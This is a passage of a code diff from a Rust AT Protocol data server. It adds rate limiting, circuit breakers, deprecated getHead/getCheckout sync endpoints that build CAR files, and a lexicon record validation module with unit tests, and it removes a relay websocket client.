fn test_rate_limiter_exhaustion() {
189
+
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
190
+
let key = "test_ip".to_string();
191
+
192
+
assert!(limiter.check_key(&key).is_ok());
193
+
assert!(limiter.check_key(&key).is_ok());
194
+
assert!(limiter.check_key(&key).is_err());
195
+
}
196
+
197
+
#[test]
198
+
fn test_different_keys_have_separate_limits() {
199
+
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
200
+
201
+
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
202
+
assert!(limiter.check_key(&"ip1".to_string()).is_err());
203
+
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
204
+
}
205
+
206
+
#[test]
207
+
fn test_builder_pattern() {
208
+
let limiters = RateLimiters::new()
209
+
.with_login_limit(20)
210
+
.with_oauth_token_limit(60)
211
+
.with_password_reset_limit(3)
212
+
.with_account_creation_limit(5);
213
+
214
+
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
215
+
}
216
+
}
+18
src/state.rs
+18
src/state.rs
···
1
use crate::config::AuthConfig;
2
use crate::repo::PostgresBlockStore;
3
use crate::storage::{BlobStorage, S3BlobStorage};
4
use crate::sync::firehose::SequencedEvent;
···
12
pub block_store: PostgresBlockStore,
13
pub blob_store: Arc<dyn BlobStorage>,
14
pub firehose_tx: broadcast::Sender<SequencedEvent>,
15
}
16
17
impl AppState {
···
21
let block_store = PostgresBlockStore::new(db.clone());
22
let blob_store = S3BlobStorage::new().await;
23
let (firehose_tx, _) = broadcast::channel(1000);
24
Self {
25
db,
26
block_store,
27
blob_store: Arc::new(blob_store),
28
firehose_tx,
29
}
30
}
31
}
···
1
+
use crate::circuit_breaker::CircuitBreakers;
2
use crate::config::AuthConfig;
3
+
use crate::rate_limit::RateLimiters;
4
use crate::repo::PostgresBlockStore;
5
use crate::storage::{BlobStorage, S3BlobStorage};
6
use crate::sync::firehose::SequencedEvent;
···
14
pub block_store: PostgresBlockStore,
15
pub blob_store: Arc<dyn BlobStorage>,
16
pub firehose_tx: broadcast::Sender<SequencedEvent>,
17
+
pub rate_limiters: Arc<RateLimiters>,
18
+
pub circuit_breakers: Arc<CircuitBreakers>,
19
}
20
21
impl AppState {
···
25
let block_store = PostgresBlockStore::new(db.clone());
26
let blob_store = S3BlobStorage::new().await;
27
let (firehose_tx, _) = broadcast::channel(1000);
28
+
let rate_limiters = Arc::new(RateLimiters::new());
29
+
let circuit_breakers = Arc::new(CircuitBreakers::new());
30
Self {
31
db,
32
block_store,
33
blob_store: Arc::new(blob_store),
34
firehose_tx,
35
+
rate_limiters,
36
+
circuit_breakers,
37
}
38
+
}
39
+
40
+
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
41
+
self.rate_limiters = Arc::new(rate_limiters);
42
+
self
43
+
}
44
+
45
+
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
46
+
self.circuit_breakers = Arc::new(circuit_breakers);
47
+
self
48
}
49
}
-4
src/sync/crawl.rs
-4
src/sync/crawl.rs
···
19
Query(params): Query<NotifyOfUpdateParams>,
20
) -> Response {
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
-
info!("TODO: Queue job for notifyOfUpdate (not implemented)");
23
-
24
(StatusCode::OK, Json(json!({}))).into_response()
25
}
26
···
34
Json(input): Json<RequestCrawlInput>,
35
) -> Response {
36
info!("Received requestCrawl for hostname: {}", input.hostname);
37
-
info!("TODO: Queue job for requestCrawl (not implemented)");
38
-
39
(StatusCode::OK, Json(json!({}))).into_response()
40
}
···
19
Query(params): Query<NotifyOfUpdateParams>,
20
) -> Response {
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
(StatusCode::OK, Json(json!({}))).into_response()
23
}
24
···
32
Json(input): Json<RequestCrawlInput>,
33
) -> Response {
34
info!("Received requestCrawl for hostname: {}", input.hostname);
35
(StatusCode::OK, Json(json!({}))).into_response()
36
}
+209
src/sync/deprecated.rs
+209
src/sync/deprecated.rs
···
···
1
+
use crate::state::AppState;
2
+
use crate::sync::car::encode_car_header;
3
+
use axum::{
4
+
Json,
5
+
extract::{Query, State},
6
+
http::StatusCode,
7
+
response::{IntoResponse, Response},
8
+
};
9
+
use cid::Cid;
10
+
use ipld_core::ipld::Ipld;
11
+
use jacquard_repo::storage::BlockStore;
12
+
use serde::{Deserialize, Serialize};
13
+
use serde_json::json;
14
+
use std::io::Write;
15
+
use std::str::FromStr;
16
+
use tracing::error;
17
+
18
+
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
20
+
#[derive(Deserialize)]
21
+
pub struct GetHeadParams {
22
+
pub did: String,
23
+
}
24
+
25
+
#[derive(Serialize)]
26
+
pub struct GetHeadOutput {
27
+
pub root: String,
28
+
}
29
+
30
+
pub async fn get_head(
31
+
State(state): State<AppState>,
32
+
Query(params): Query<GetHeadParams>,
33
+
) -> Response {
34
+
let did = params.did.trim();
35
+
36
+
if did.is_empty() {
37
+
return (
38
+
StatusCode::BAD_REQUEST,
39
+
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
40
+
)
41
+
.into_response();
42
+
}
43
+
44
+
let result = sqlx::query!(
45
+
r#"
46
+
SELECT r.repo_root_cid
47
+
FROM repos r
48
+
JOIN users u ON r.user_id = u.id
49
+
WHERE u.did = $1
50
+
"#,
51
+
did
52
+
)
53
+
.fetch_optional(&state.db)
54
+
.await;
55
+
56
+
match result {
57
+
Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
58
+
Ok(None) => (
59
+
StatusCode::BAD_REQUEST,
60
+
Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
61
+
)
62
+
.into_response(),
63
+
Err(e) => {
64
+
error!("DB error in get_head: {:?}", e);
65
+
(
66
+
StatusCode::INTERNAL_SERVER_ERROR,
67
+
Json(json!({"error": "InternalError"})),
68
+
)
69
+
.into_response()
70
+
}
71
+
}
72
+
}
73
+
74
+
#[derive(Deserialize)]
75
+
pub struct GetCheckoutParams {
76
+
pub did: String,
77
+
}
78
+
79
+
pub async fn get_checkout(
80
+
State(state): State<AppState>,
81
+
Query(params): Query<GetCheckoutParams>,
82
+
) -> Response {
83
+
let did = params.did.trim();
84
+
85
+
if did.is_empty() {
86
+
return (
87
+
StatusCode::BAD_REQUEST,
88
+
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
89
+
)
90
+
.into_response();
91
+
}
92
+
93
+
let repo_row = sqlx::query!(
94
+
r#"
95
+
SELECT r.repo_root_cid
96
+
FROM repos r
97
+
JOIN users u ON u.id = r.user_id
98
+
WHERE u.did = $1
99
+
"#,
100
+
did
101
+
)
102
+
.fetch_optional(&state.db)
103
+
.await
104
+
.unwrap_or(None);
105
+
106
+
let head_str = match repo_row {
107
+
Some(r) => r.repo_root_cid,
108
+
None => {
109
+
let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did)
110
+
.fetch_optional(&state.db)
111
+
.await
112
+
.unwrap_or(None);
113
+
114
+
if user_exists.is_none() {
115
+
return (
116
+
StatusCode::NOT_FOUND,
117
+
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
118
+
)
119
+
.into_response();
120
+
} else {
121
+
return (
122
+
StatusCode::NOT_FOUND,
123
+
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
124
+
)
125
+
.into_response();
126
+
}
127
+
}
128
+
};
129
+
130
+
let head_cid = match Cid::from_str(&head_str) {
131
+
Ok(c) => c,
132
+
Err(_) => {
133
+
return (
134
+
StatusCode::INTERNAL_SERVER_ERROR,
135
+
Json(json!({"error": "InternalError", "message": "Invalid head CID"})),
136
+
)
137
+
.into_response();
138
+
}
139
+
};
140
+
141
+
let mut car_bytes = match encode_car_header(&head_cid) {
142
+
Ok(h) => h,
143
+
Err(e) => {
144
+
return (
145
+
StatusCode::INTERNAL_SERVER_ERROR,
146
+
Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})),
147
+
)
148
+
.into_response();
149
+
}
150
+
};
151
+
152
+
let mut stack = vec![head_cid];
153
+
let mut visited = std::collections::HashSet::new();
154
+
let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL;
155
+
156
+
while let Some(cid) = stack.pop() {
157
+
if visited.contains(&cid) {
158
+
continue;
159
+
}
160
+
visited.insert(cid);
161
+
if remaining == 0 {
162
+
break;
163
+
}
164
+
remaining -= 1;
165
+
166
+
if let Ok(Some(block)) = state.block_store.get(&cid).await {
167
+
let cid_bytes = cid.to_bytes();
168
+
let total_len = cid_bytes.len() + block.len();
169
+
let mut writer = Vec::new();
170
+
crate::sync::car::write_varint(&mut writer, total_len as u64)
171
+
.expect("Writing to Vec<u8> should never fail");
172
+
writer.write_all(&cid_bytes)
173
+
.expect("Writing to Vec<u8> should never fail");
174
+
writer.write_all(&block)
175
+
.expect("Writing to Vec<u8> should never fail");
176
+
car_bytes.extend_from_slice(&writer);
177
+
178
+
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
179
+
extract_links_ipld(&value, &mut stack);
180
+
}
181
+
}
182
+
}
183
+
184
+
(
185
+
StatusCode::OK,
186
+
[(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")],
187
+
car_bytes,
188
+
)
189
+
.into_response()
190
+
}
191
+
192
+
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
193
+
match value {
194
+
Ipld::Link(cid) => {
195
+
stack.push(*cid);
196
+
}
197
+
Ipld::Map(map) => {
198
+
for v in map.values() {
199
+
extract_links_ipld(v, stack);
200
+
}
201
+
}
202
+
Ipld::List(arr) => {
203
+
for v in arr {
204
+
extract_links_ipld(v, stack);
205
+
}
206
+
}
207
+
_ => {}
208
+
}
209
+
}
+3
-2
src/sync/mod.rs
+3
-2
src/sync/mod.rs
···
2
pub mod car;
3
pub mod commit;
4
pub mod crawl;
5
pub mod firehose;
6
pub mod frame;
7
pub mod import;
8
pub mod listener;
9
-
pub mod relay_client;
10
pub mod repo;
11
pub mod subscribe_repos;
12
pub mod util;
···
15
pub use blob::{get_blob, list_blobs};
16
pub use commit::{get_latest_commit, get_repo_status, list_repos};
17
pub use crawl::{notify_of_update, request_crawl};
18
-
pub use repo::{get_blocks, get_repo, get_record};
19
pub use subscribe_repos::subscribe_repos;
20
pub use verify::{CarVerifier, VerifiedCar, VerifyError};
···
2
pub mod car;
3
pub mod commit;
4
pub mod crawl;
5
+
pub mod deprecated;
6
pub mod firehose;
7
pub mod frame;
8
pub mod import;
9
pub mod listener;
10
pub mod repo;
11
pub mod subscribe_repos;
12
pub mod util;
···
15
pub use blob::{get_blob, list_blobs};
16
pub use commit::{get_latest_commit, get_repo_status, list_repos};
17
pub use crawl::{notify_of_update, request_crawl};
18
+
pub use deprecated::{get_checkout, get_head};
19
+
pub use repo::{get_blocks, get_record, get_repo};
20
pub use subscribe_repos::subscribe_repos;
21
pub use verify::{CarVerifier, VerifiedCar, VerifyError};
-83
src/sync/relay_client.rs
-83
src/sync/relay_client.rs
···
1
-
use crate::state::AppState;
2
-
use crate::sync::util::format_event_for_sending;
3
-
use futures::{sink::SinkExt, stream::StreamExt};
4
-
use std::time::Duration;
5
-
use tokio::sync::mpsc;
6
-
use tokio_tungstenite::{connect_async, tungstenite::Message};
7
-
use tracing::{error, info, warn};
8
-
9
-
async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) {
10
-
info!("Starting firehose client for relay: {}", url);
11
-
loop {
12
-
match connect_async(&url).await {
13
-
Ok((mut ws_stream, _)) => {
14
-
info!("Connected to firehose relay: {}", url);
15
-
let mut rx = state.firehose_tx.subscribe();
16
-
if let Some(tx) = ready_tx.as_ref() {
17
-
tx.send(()).await.ok();
18
-
}
19
-
20
-
loop {
21
-
tokio::select! {
22
-
Ok(event) = rx.recv() => {
23
-
match format_event_for_sending(&state, event).await {
24
-
Ok(bytes) => {
25
-
if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await {
26
-
warn!("Failed to send event to {}: {}. Disconnecting.", url, e);
27
-
break;
28
-
}
29
-
}
30
-
Err(e) => {
31
-
error!("Failed to format event for relay {}: {}", url, e);
32
-
}
33
-
}
34
-
}
35
-
Some(msg) = ws_stream.next() => {
36
-
if let Ok(Message::Close(_)) = msg {
37
-
warn!("Relay {} closed connection.", url);
38
-
break;
39
-
}
40
-
}
41
-
else => break,
42
-
}
43
-
}
44
-
}
45
-
Err(e) => {
46
-
error!("Failed to connect to firehose relay {}: {}", url, e);
47
-
}
48
-
}
49
-
warn!(
50
-
"Disconnected from {}. Reconnecting in 5 seconds...",
51
-
url
52
-
);
53
-
tokio::time::sleep(Duration::from_secs(5)).await;
54
-
}
55
-
}
56
-
57
-
pub async fn start_relay_clients(
58
-
state: AppState,
59
-
relays: Vec<String>,
60
-
mut ready_rx: Option<mpsc::Receiver<()>>,
61
-
) {
62
-
if relays.is_empty() {
63
-
return;
64
-
}
65
-
66
-
let (ready_tx, mut internal_ready_rx) = mpsc::channel(1);
67
-
68
-
for url in relays {
69
-
let ready_tx = if ready_rx.is_some() {
70
-
Some(ready_tx.clone())
71
-
} else {
72
-
None
73
-
};
74
-
tokio::spawn(run_relay_client(state.clone(), url, ready_tx));
75
-
}
76
-
77
-
if let Some(mut rx) = ready_rx.take() {
78
-
tokio::spawn(async move {
79
-
internal_ready_rx.recv().await;
80
-
rx.close();
81
-
});
82
-
}
83
-
}
···
+504
src/validation/mod.rs
+504
src/validation/mod.rs
···
···
1
+
use serde_json::Value;
2
+
use thiserror::Error;
3
+
4
+
#[derive(Debug, Error)]
5
+
pub enum ValidationError {
6
+
#[error("No $type provided")]
7
+
MissingType,
8
+
9
+
#[error("Invalid $type: expected {expected}, got {actual}")]
10
+
TypeMismatch { expected: String, actual: String },
11
+
12
+
#[error("Missing required field: {0}")]
13
+
MissingField(String),
14
+
15
+
#[error("Invalid field value at {path}: {message}")]
16
+
InvalidField { path: String, message: String },
17
+
18
+
#[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")]
19
+
InvalidDatetime { path: String },
20
+
21
+
#[error("Invalid record: {0}")]
22
+
InvalidRecord(String),
23
+
24
+
#[error("Unknown record type: {0}")]
25
+
UnknownType(String),
26
+
}
27
+
28
+
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
29
+
pub enum ValidationStatus {
30
+
Valid,
31
+
Unknown,
32
+
Invalid,
33
+
}
34
+
35
+
pub struct RecordValidator {
36
+
require_lexicon: bool,
37
+
}
38
+
39
+
impl Default for RecordValidator {
40
+
fn default() -> Self {
41
+
Self::new()
42
+
}
43
+
}
44
+
45
+
impl RecordValidator {
46
+
pub fn new() -> Self {
47
+
Self {
48
+
require_lexicon: false,
49
+
}
50
+
}
51
+
52
+
pub fn require_lexicon(mut self, require: bool) -> Self {
53
+
self.require_lexicon = require;
54
+
self
55
+
}
56
+
57
+
pub fn validate(
58
+
&self,
59
+
record: &Value,
60
+
collection: &str,
61
+
) -> Result<ValidationStatus, ValidationError> {
62
+
let obj = record
63
+
.as_object()
64
+
.ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
65
+
66
+
let record_type = obj
67
+
.get("$type")
68
+
.and_then(|v| v.as_str())
69
+
.ok_or(ValidationError::MissingType)?;
70
+
71
+
if record_type != collection {
72
+
return Err(ValidationError::TypeMismatch {
73
+
expected: collection.to_string(),
74
+
actual: record_type.to_string(),
75
+
});
76
+
}
77
+
78
+
if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) {
79
+
validate_datetime(created_at, "createdAt")?;
80
+
}
81
+
82
+
match record_type {
83
+
"app.bsky.feed.post" => self.validate_post(obj)?,
84
+
"app.bsky.actor.profile" => self.validate_profile(obj)?,
85
+
"app.bsky.feed.like" => self.validate_like(obj)?,
86
+
"app.bsky.feed.repost" => self.validate_repost(obj)?,
87
+
"app.bsky.graph.follow" => self.validate_follow(obj)?,
88
+
"app.bsky.graph.block" => self.validate_block(obj)?,
89
+
"app.bsky.graph.list" => self.validate_list(obj)?,
90
+
"app.bsky.graph.listitem" => self.validate_list_item(obj)?,
91
+
"app.bsky.feed.generator" => self.validate_feed_generator(obj)?,
92
+
"app.bsky.feed.threadgate" => self.validate_threadgate(obj)?,
93
+
"app.bsky.labeler.service" => self.validate_labeler_service(obj)?,
94
+
_ => {
95
+
if self.require_lexicon {
96
+
return Err(ValidationError::UnknownType(record_type.to_string()));
97
+
}
98
+
return Ok(ValidationStatus::Unknown);
99
+
}
100
+
}
101
+
102
+
Ok(ValidationStatus::Valid)
103
+
}
104
+
105
+
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
106
+
if !obj.contains_key("text") {
107
+
return Err(ValidationError::MissingField("text".to_string()));
108
+
}
109
+
110
+
if !obj.contains_key("createdAt") {
111
+
return Err(ValidationError::MissingField("createdAt".to_string()));
112
+
}
113
+
114
+
if let Some(text) = obj.get("text").and_then(|v| v.as_str()) {
115
+
let grapheme_count = text.chars().count();
116
+
if grapheme_count > 3000 {
117
+
return Err(ValidationError::InvalidField {
118
+
path: "text".to_string(),
119
+
message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
120
+
});
121
+
}
122
+
}
123
+
124
+
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
125
+
if langs.len() > 3 {
126
+
return Err(ValidationError::InvalidField {
127
+
path: "langs".to_string(),
128
+
message: "Maximum 3 languages allowed".to_string(),
129
+
});
130
+
}
131
+
}
132
+
133
+
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
134
+
if tags.len() > 8 {
135
+
return Err(ValidationError::InvalidField {
136
+
path: "tags".to_string(),
137
+
message: "Maximum 8 tags allowed".to_string(),
138
+
});
139
+
}
140
+
for (i, tag) in tags.iter().enumerate() {
141
+
if let Some(tag_str) = tag.as_str() {
142
+
if tag_str.len() > 640 {
143
+
return Err(ValidationError::InvalidField {
144
+
path: format!("tags/{}", i),
145
+
message: "Tag exceeds maximum length of 640 bytes".to_string(),
146
+
});
147
+
}
148
+
}
149
+
}
150
+
}
151
+
152
+
Ok(())
153
+
}
154
+
155
+
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
156
+
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
157
+
let grapheme_count = display_name.chars().count();
158
+
if grapheme_count > 640 {
159
+
return Err(ValidationError::InvalidField {
160
+
path: "displayName".to_string(),
161
+
message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
162
+
});
163
+
}
164
+
}
165
+
166
+
if let Some(description) = obj.get("description").and_then(|v| v.as_str()) {
167
+
let grapheme_count = description.chars().count();
168
+
if grapheme_count > 2560 {
169
+
return Err(ValidationError::InvalidField {
170
+
path: "description".to_string(),
171
+
message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
172
+
});
173
+
}
174
+
}
175
+
176
+
Ok(())
177
+
}
178
+
179
+
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
180
+
if !obj.contains_key("subject") {
181
+
return Err(ValidationError::MissingField("subject".to_string()));
182
+
}
183
+
if !obj.contains_key("createdAt") {
184
+
return Err(ValidationError::MissingField("createdAt".to_string()));
185
+
}
186
+
self.validate_strong_ref(obj.get("subject"), "subject")?;
187
+
Ok(())
188
+
}
189
+
190
+
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
191
+
if !obj.contains_key("subject") {
192
+
return Err(ValidationError::MissingField("subject".to_string()));
193
+
}
194
+
if !obj.contains_key("createdAt") {
195
+
return Err(ValidationError::MissingField("createdAt".to_string()));
196
+
}
197
+
self.validate_strong_ref(obj.get("subject"), "subject")?;
198
+
Ok(())
199
+
}
200
+
201
+
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
202
+
if !obj.contains_key("subject") {
203
+
return Err(ValidationError::MissingField("subject".to_string()));
204
+
}
205
+
if !obj.contains_key("createdAt") {
206
+
return Err(ValidationError::MissingField("createdAt".to_string()));
207
+
}
208
+
209
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
210
+
if !subject.starts_with("did:") {
211
+
return Err(ValidationError::InvalidField {
212
+
path: "subject".to_string(),
213
+
message: "Subject must be a DID".to_string(),
214
+
});
215
+
}
216
+
}
217
+
218
+
Ok(())
219
+
}
220
+
221
+
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
222
+
if !obj.contains_key("subject") {
223
+
return Err(ValidationError::MissingField("subject".to_string()));
224
+
}
225
+
if !obj.contains_key("createdAt") {
226
+
return Err(ValidationError::MissingField("createdAt".to_string()));
227
+
}
228
+
229
+
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
230
+
if !subject.starts_with("did:") {
231
+
return Err(ValidationError::InvalidField {
232
+
path: "subject".to_string(),
233
+
message: "Subject must be a DID".to_string(),
234
+
});
235
+
}
236
+
}
237
+
238
+
Ok(())
239
+
}
240
+
241
+
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
242
+
if !obj.contains_key("name") {
243
+
return Err(ValidationError::MissingField("name".to_string()));
244
+
}
245
+
if !obj.contains_key("purpose") {
246
+
return Err(ValidationError::MissingField("purpose".to_string()));
247
+
}
248
+
if !obj.contains_key("createdAt") {
249
+
return Err(ValidationError::MissingField("createdAt".to_string()));
250
+
}
251
+
252
+
if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
253
+
if name.is_empty() || name.len() > 64 {
254
+
return Err(ValidationError::InvalidField {
255
+
path: "name".to_string(),
256
+
message: "Name must be 1-64 characters".to_string(),
257
+
});
258
+
}
259
+
}
260
+
261
+
Ok(())
262
+
}
263
+
264
+
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
265
+
if !obj.contains_key("subject") {
266
+
return Err(ValidationError::MissingField("subject".to_string()));
267
+
}
268
+
if !obj.contains_key("list") {
269
+
return Err(ValidationError::MissingField("list".to_string()));
270
+
}
271
+
if !obj.contains_key("createdAt") {
272
+
return Err(ValidationError::MissingField("createdAt".to_string()));
273
+
}
274
+
Ok(())
275
+
}
276
+
277
+
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
278
+
if !obj.contains_key("did") {
279
+
return Err(ValidationError::MissingField("did".to_string()));
280
+
}
281
+
if !obj.contains_key("displayName") {
282
+
return Err(ValidationError::MissingField("displayName".to_string()));
283
+
}
284
+
if !obj.contains_key("createdAt") {
285
+
return Err(ValidationError::MissingField("createdAt".to_string()));
286
+
}
287
+
288
+
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
289
+
if display_name.is_empty() || display_name.len() > 240 {
290
+
return Err(ValidationError::InvalidField {
291
+
path: "displayName".to_string(),
292
+
message: "displayName must be 1-240 characters".to_string(),
293
+
});
294
+
}
295
+
}
296
+
297
+
Ok(())
298
+
}
299
+
300
+
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
301
+
if !obj.contains_key("post") {
302
+
return Err(ValidationError::MissingField("post".to_string()));
303
+
}
304
+
if !obj.contains_key("createdAt") {
305
+
return Err(ValidationError::MissingField("createdAt".to_string()));
306
+
}
307
+
Ok(())
308
+
}
309
+
310
+
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
311
+
if !obj.contains_key("policies") {
312
+
return Err(ValidationError::MissingField("policies".to_string()));
313
+
}
314
+
if !obj.contains_key("createdAt") {
315
+
return Err(ValidationError::MissingField("createdAt".to_string()));
316
+
}
317
+
Ok(())
318
+
}
319
+
320
+
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
321
+
let obj = value
322
+
.and_then(|v| v.as_object())
323
+
.ok_or_else(|| ValidationError::InvalidField {
324
+
path: path.to_string(),
325
+
message: "Must be a strong reference object".to_string(),
326
+
})?;
327
+
328
+
if !obj.contains_key("uri") {
329
+
return Err(ValidationError::MissingField(format!("{}/uri", path)));
330
+
}
331
+
if !obj.contains_key("cid") {
332
+
return Err(ValidationError::MissingField(format!("{}/cid", path)));
333
+
}
334
+
335
+
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
336
+
if !uri.starts_with("at://") {
337
+
return Err(ValidationError::InvalidField {
338
+
path: format!("{}/uri", path),
339
+
message: "URI must be an at:// URI".to_string(),
340
+
});
341
+
}
342
+
}
343
+
344
+
Ok(())
345
+
}
346
+
}
347
+
348
+
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
349
+
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
350
+
return Err(ValidationError::InvalidDatetime {
351
+
path: path.to_string(),
352
+
});
353
+
}
354
+
Ok(())
355
+
}
356
+
357
+
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
358
+
if rkey.is_empty() {
359
+
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
360
+
}
361
+
362
+
if rkey.len() > 512 {
363
+
return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
364
+
}
365
+
366
+
if rkey == "." || rkey == ".." {
367
+
return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
368
+
}
369
+
370
+
let valid_chars = rkey.chars().all(|c| {
371
+
c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'
372
+
});
373
+
374
+
if !valid_chars {
375
+
return Err(ValidationError::InvalidRecord(
376
+
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string()
377
+
));
378
+
}
379
+
380
+
Ok(())
381
+
}
382
+
383
+
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
384
+
if collection.is_empty() {
385
+
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
386
+
}
387
+
388
+
let parts: Vec<&str> = collection.split('.').collect();
389
+
if parts.len() < 3 {
390
+
return Err(ValidationError::InvalidRecord(
391
+
"Collection NSID must have at least 3 segments".to_string()
392
+
));
393
+
}
394
+
395
+
for part in &parts {
396
+
if part.is_empty() {
397
+
return Err(ValidationError::InvalidRecord(
398
+
"Collection NSID segments cannot be empty".to_string()
399
+
));
400
+
}
401
+
if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
402
+
return Err(ValidationError::InvalidRecord(
403
+
"Collection NSID segments must be alphanumeric or hyphens".to_string()
404
+
));
405
+
}
406
+
}
407
+
408
+
Ok(())
409
+
}
410
+
411
+
#[cfg(test)]
412
+
mod tests {
413
+
use super::*;
414
+
use serde_json::json;
415
+
416
+
#[test]
417
+
fn test_validate_post() {
418
+
let validator = RecordValidator::new();
419
+
420
+
let valid_post = json!({
421
+
"$type": "app.bsky.feed.post",
422
+
"text": "Hello, world!",
423
+
"createdAt": "2024-01-01T00:00:00.000Z"
424
+
});
425
+
426
+
assert_eq!(
427
+
validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
428
+
ValidationStatus::Valid
429
+
);
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_post_missing_text() {
434
+
let validator = RecordValidator::new();
435
+
436
+
let invalid_post = json!({
437
+
"$type": "app.bsky.feed.post",
438
+
"createdAt": "2024-01-01T00:00:00.000Z"
439
+
});
440
+
441
+
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
442
+
}
443
+
444
+
#[test]
445
+
fn test_validate_type_mismatch() {
446
+
let validator = RecordValidator::new();
447
+
448
+
let record = json!({
449
+
"$type": "app.bsky.feed.like",
450
+
"subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."},
451
+
"createdAt": "2024-01-01T00:00:00.000Z"
452
+
});
453
+
454
+
let result = validator.validate(&record, "app.bsky.feed.post");
455
+
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
456
+
}
457
+
458
+
#[test]
459
+
fn test_validate_unknown_type() {
460
+
let validator = RecordValidator::new();
461
+
462
+
let record = json!({
463
+
"$type": "com.example.custom",
464
+
"data": "test"
465
+
});
466
+
467
+
assert_eq!(
468
+
validator.validate(&record, "com.example.custom").unwrap(),
469
+
ValidationStatus::Unknown
470
+
);
471
+
}
472
+
473
+
#[test]
474
+
fn test_validate_unknown_type_strict() {
475
+
let validator = RecordValidator::new().require_lexicon(true);
476
+
477
+
let record = json!({
478
+
"$type": "com.example.custom",
479
+
"data": "test"
480
+
});
481
+
482
+
let result = validator.validate(&record, "com.example.custom");
483
+
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
484
+
}
485
+
486
+
#[test]
487
+
fn test_validate_record_key() {
488
+
assert!(validate_record_key("valid-key_123").is_ok());
489
+
assert!(validate_record_key("3k2n5j2").is_ok());
490
+
assert!(validate_record_key(".").is_err());
491
+
assert!(validate_record_key("..").is_err());
492
+
assert!(validate_record_key("").is_err());
493
+
assert!(validate_record_key("invalid/key").is_err());
494
+
}
495
+
496
+
#[test]
497
+
fn test_validate_collection_nsid() {
498
+
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
499
+
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
500
+
assert!(validate_collection_nsid("invalid").is_err());
501
+
assert!(validate_collection_nsid("a.b").is_err());
502
+
assert!(validate_collection_nsid("").is_err());
503
+
}
504
+
}
+315
tests/image_processing.rs
+315
tests/image_processing.rs
···
···
1
+
